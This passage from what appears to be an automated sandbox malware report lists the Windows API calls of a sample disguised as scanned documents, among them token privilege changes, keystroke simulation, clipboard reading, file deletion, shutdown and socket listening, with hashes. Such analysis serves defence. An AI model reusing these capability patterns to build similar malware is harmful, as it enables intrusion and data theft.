                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF50B
                                                      • keybd_event.USER32(00000012,00000000), ref: 002DF510
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF519
                                                      • keybd_event.USER32(00000012,00000000), ref: 002DF51E
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF528
                                                      • keybd_event.USER32(00000012,00000000), ref: 002DF52D
                                                      • SetForegroundWindow.USER32(00000000), ref: 002DF530
                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 002DF557
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: fbcc5cecfe14e00a34ef7da674bc1c4fa09b1a7f910e483515913a78c4f2fbea
                                                      • Instruction ID: f89819f9bcb69829e1538d410d08340e13bc1896844a0ddfee1985396a66760b
                                                      • Opcode Fuzzy Hash: fbcc5cecfe14e00a34ef7da674bc1c4fa09b1a7f910e483515913a78c4f2fbea
                                                      • Instruction Fuzzy Hash: 0931A371AA0318BFEB216FB55C4AFFF7E6CEB48B50F105026FA01E61D1C6B05D10AA64
                                                      Function 002E1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002E170D
                                                        • Part of subcall function 002E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002E173A
                                                        • Part of subcall function 002E16C3: GetLastError.KERNEL32 ref: 002E174A
                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 002E1286
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002E12A8
                                                      • CloseHandle.KERNEL32(?), ref: 002E12B9
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002E12D1
                                                      • GetProcessWindowStation.USER32 ref: 002E12EA
                                                      • SetProcessWindowStation.USER32(00000000), ref: 002E12F4
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002E1310
                                                        • Part of subcall function 002E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002E11FC), ref: 002E10D4
                                                        • Part of subcall function 002E10BF: CloseHandle.KERNEL32(?,?,002E11FC), ref: 002E10E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                      • String ID: $default$winsta0$Z4
                                                      • API String ID: 22674027-3531531049
                                                      • Opcode ID: 2a2df4500051778c6178d2710d5e2b32c91d75ab1359d34614df88dc1b421bd1
                                                      • Instruction ID: d8bd28a49588843ea83004e222590560d82091cda478d524fa5b16e8ad12e8a8
                                                      • Opcode Fuzzy Hash: 2a2df4500051778c6178d2710d5e2b32c91d75ab1359d34614df88dc1b421bd1
                                                      • Instruction Fuzzy Hash: 9181A2719A0289AFDF119FA5DC49FEE7BBDEF08704F148129F911A62A0D7708964CB20
                                                      Function 002E0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002E1114
                                                        • Part of subcall function 002E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1120
                                                        • Part of subcall function 002E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E112F
                                                        • Part of subcall function 002E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1136
                                                        • Part of subcall function 002E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002E114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002E0BCC
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002E0C00
                                                      • GetLengthSid.ADVAPI32(?), ref: 002E0C17
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 002E0C51
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002E0C6D
                                                      • GetLengthSid.ADVAPI32(?), ref: 002E0C84
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002E0C8C
                                                      • HeapAlloc.KERNEL32(00000000), ref: 002E0C93
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002E0CB4
                                                      • CopySid.ADVAPI32(00000000), ref: 002E0CBB
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002E0CEA
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002E0D0C
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002E0D1E
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0D45
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0D4C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0D55
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0D5C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0D65
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0D6C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 002E0D78
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0D7F
                                                        • Part of subcall function 002E1193: GetProcessHeap.KERNEL32(00000008,002E0BB1,?,00000000,?,002E0BB1,?), ref: 002E11A1
                                                        • Part of subcall function 002E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,002E0BB1,?), ref: 002E11A8
                                                        • Part of subcall function 002E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002E0BB1,?), ref: 002E11B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: 1341e62a085a9870350e72ba016e9a9f9b649b7d83f7a2f46e56588987fe779f
                                                      • Instruction ID: 82ddb8f452d20fee0ee59ca0a917704e3e068c11ba30ef5831d356e833ef2619
                                                      • Opcode Fuzzy Hash: 1341e62a085a9870350e72ba016e9a9f9b649b7d83f7a2f46e56588987fe779f
                                                      • Instruction Fuzzy Hash: 0571AC7199024AEBDF11DFA5DC84BEEBBBCFF08300F548125E904A6190D7B4A956CB60
                                                      Function 002FEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenClipboard.USER32(0031CC08), ref: 002FEB29
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 002FEB37
                                                      • GetClipboardData.USER32(0000000D), ref: 002FEB43
                                                      • CloseClipboard.USER32 ref: 002FEB4F
                                                      • GlobalLock.KERNEL32(00000000), ref: 002FEB87
                                                      • CloseClipboard.USER32 ref: 002FEB91
                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 002FEBBC
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 002FEBC9
                                                      • GetClipboardData.USER32(00000001), ref: 002FEBD1
                                                      • GlobalLock.KERNEL32(00000000), ref: 002FEBE2
                                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 002FEC22
                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 002FEC38
                                                      • GetClipboardData.USER32(0000000F), ref: 002FEC44
                                                      • GlobalLock.KERNEL32(00000000), ref: 002FEC55
                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 002FEC77
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002FEC94
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002FECD2
                                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 002FECF3
                                                      • CountClipboardFormats.USER32 ref: 002FED14
                                                      • CloseClipboard.USER32 ref: 002FED59
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                      • String ID:
                                                      • API String ID: 420908878-0
                                                      • Opcode ID: 7f09b5db3193e795178c4b0ff1a2648b88d945e8fd6a157f6ed364a02d04d276
                                                      • Instruction ID: 65c0dc1c010be3864566265474033bd07e090f329bd3ac72dc7a49cd6c1b1ca9
                                                      • Opcode Fuzzy Hash: 7f09b5db3193e795178c4b0ff1a2648b88d945e8fd6a157f6ed364a02d04d276
                                                      • Instruction Fuzzy Hash: 5061F1342243069FD702EF24C894F7AB7A8AF88744F099469F546972B2CB31DD56CB62
                                                      Function 002F698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002F69BE
                                                      • FindClose.KERNEL32(00000000), ref: 002F6A12
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002F6A4E
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002F6A75
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 002F6AB2
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 002F6ADF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                      • API String ID: 3830820486-3289030164
                                                      • Opcode ID: 877e646be721c84fed658d0eca3a6c230e835d2f6d1df914775d3014a6d55b73
                                                      • Instruction ID: 5bd927b0ae1a47fc5d556a47e21ed2311610b2058a39425e34cfecd2fa236369
                                                      • Opcode Fuzzy Hash: 877e646be721c84fed658d0eca3a6c230e835d2f6d1df914775d3014a6d55b73
                                                      • Instruction Fuzzy Hash: F4D17EB6518300AFC710EFA0C896EBBB7ECAF98704F04491DF685D6191EB74DA54CB62
                                                      Function 002F9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002F9663
                                                      • GetFileAttributesW.KERNEL32(?), ref: 002F96A1
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 002F96BB
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 002F96D3
                                                      • FindClose.KERNEL32(00000000), ref: 002F96DE
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 002F96FA
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 002F974A
                                                      • SetCurrentDirectoryW.KERNEL32(00346B7C), ref: 002F9768
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 002F9772
                                                      • FindClose.KERNEL32(00000000), ref: 002F977F
                                                      • FindClose.KERNEL32(00000000), ref: 002F978F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1409584000-438819550
                                                      • Opcode ID: 367f17ec5dc015b5edcb26a5c41fc23268fa3817b78478a9066cd33b1e2b603e
                                                      • Instruction ID: 57014b077431b1a204682e008c18cfcc298b3c6982ad54b1f33e8d6abb52eadd
                                                      • Opcode Fuzzy Hash: 367f17ec5dc015b5edcb26a5c41fc23268fa3817b78478a9066cd33b1e2b603e
                                                      • Instruction Fuzzy Hash: 2331F37256021E6FCF15AFB4DC09BEEB7AC9F09361F108465FA15E21A0DB74DDA08E10
                                                      Function 002F979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002F97BE
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 002F9819
                                                      • FindClose.KERNEL32(00000000), ref: 002F9824
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 002F9840
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 002F9890
                                                      • SetCurrentDirectoryW.KERNEL32(00346B7C), ref: 002F98AE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 002F98B8
                                                      • FindClose.KERNEL32(00000000), ref: 002F98C5
                                                      • FindClose.KERNEL32(00000000), ref: 002F98D5
                                                        • Part of subcall function 002EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002EDB00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 2640511053-438819550
                                                      • Opcode ID: d7a804547303665b34b26ef9e80fef6d0abe0a966dc27891a9684f775a7b061f
                                                      • Instruction ID: 568cd8216131da1b3fadb1df913893ca5cba020ba07f327b45fedd34a50efabe
                                                      • Opcode Fuzzy Hash: d7a804547303665b34b26ef9e80fef6d0abe0a966dc27891a9684f775a7b061f
                                                      • Instruction Fuzzy Hash: 3A31E53156021E6BDF11AFB4DC49BEEB7AC9F0A3A0F108565F910A2190DB70DDE5CE60
                                                      Function 002F8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 002F8257
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 002F8267
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002F8273
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002F8310
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 002F8324
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 002F8356
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002F838C
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 002F8395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                      • String ID: *.*
                                                      • API String ID: 1464919966-438819550
                                                      • Opcode ID: 6247f0d3fabe6aada737deaa4afa8c71f664ef1cd7b0453acb20b831e671f02f
                                                      • Instruction ID: 2af44eac750078bf63517f88ea6a4e90af3b5699c7e863fef82c096fc71d7ba8
                                                      • Opcode Fuzzy Hash: 6247f0d3fabe6aada737deaa4afa8c71f664ef1cd7b0453acb20b831e671f02f
                                                      • Instruction Fuzzy Hash: A5617B765243499FCB10EF20C8409AEF3E8BF89350F04892DF98987251DB35E965CF92
                                                      Function 002ED076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00283AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00283A97,?,?,00282E7F,?,?,?,00000000), ref: 00283AC2
                                                        • Part of subcall function 002EE199: GetFileAttributesW.KERNEL32(?,002ECF95), ref: 002EE19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002ED122
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 002ED1DD
                                                      • MoveFileW.KERNEL32(?,?), ref: 002ED1F0
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 002ED20D
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 002ED237
                                                        • Part of subcall function 002ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,002ED21C,?,?), ref: 002ED2B2
                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 002ED253
                                                      • FindClose.KERNEL32(00000000), ref: 002ED264
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 1946585618-1173974218
                                                      • Opcode ID: 131cbb8eed13b54b539bfc738c0261d0bb058eb1323626751768daa9bfcc32b7
                                                      • Instruction ID: 4cfabbc6233a9a85c42f4f2a5abe6d3a69204bbafe3ddb913771223f31507ab6
                                                      • Opcode Fuzzy Hash: 131cbb8eed13b54b539bfc738c0261d0bb058eb1323626751768daa9bfcc32b7
                                                      • Instruction Fuzzy Hash: E2618B3586218E9BCF05EBE1CA529FDB779AF15300F644065E80177192EB316F69CF60
                                                      Function 002FED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: c6449ef0116cb54273e46f0ce1564a31c8268be3f3459953d38d4f094a3688ee
                                                      • Instruction ID: b8db70e3333c0a9901d631f49029f387ac027f95324869532cfe7343fdb56661
                                                      • Opcode Fuzzy Hash: c6449ef0116cb54273e46f0ce1564a31c8268be3f3459953d38d4f094a3688ee
                                                      • Instruction Fuzzy Hash: 4441F434224211AFEB12DF15E848F69BBE8FF48368F15C0A9E5158BA72C775EC51CB90
                                                      Function 002EE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002E170D
                                                        • Part of subcall function 002E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002E173A
                                                        • Part of subcall function 002E16C3: GetLastError.KERNEL32 ref: 002E174A
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 002EE932
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $ $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-3163812486
                                                      • Opcode ID: 81587156f931dca1f38aaf717ec19389ab500d552ac515efb2bdc1ffbe6b519a
                                                      • Instruction ID: 48fb94757b65e186b3539ed52f6c1b7c766f04c87a93850431c9bcf5597f2729
                                                      • Opcode Fuzzy Hash: 81587156f931dca1f38aaf717ec19389ab500d552ac515efb2bdc1ffbe6b519a
                                                      • Instruction Fuzzy Hash: CB012B726B0252ABEF1466B69C86FFB72DC9708740F564421FC02E71D3E6A09C6485A0
                                                      Function 00301204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00301276
                                                      • WSAGetLastError.WSOCK32 ref: 00301283
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 003012BA
                                                      • WSAGetLastError.WSOCK32 ref: 003012C5
                                                      • closesocket.WSOCK32(00000000), ref: 003012F4
                                                      • listen.WSOCK32(00000000,00000005), ref: 00301303
                                                      • WSAGetLastError.WSOCK32 ref: 0030130D
                                                      • closesocket.WSOCK32(00000000), ref: 0030133C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                      • String ID:
                                                      • API String ID: 540024437-0
                                                      • Opcode ID: 9c051db06c40a08a81aec14532bb3c146a1dff7735d1b32e78106f0b1fb0b172
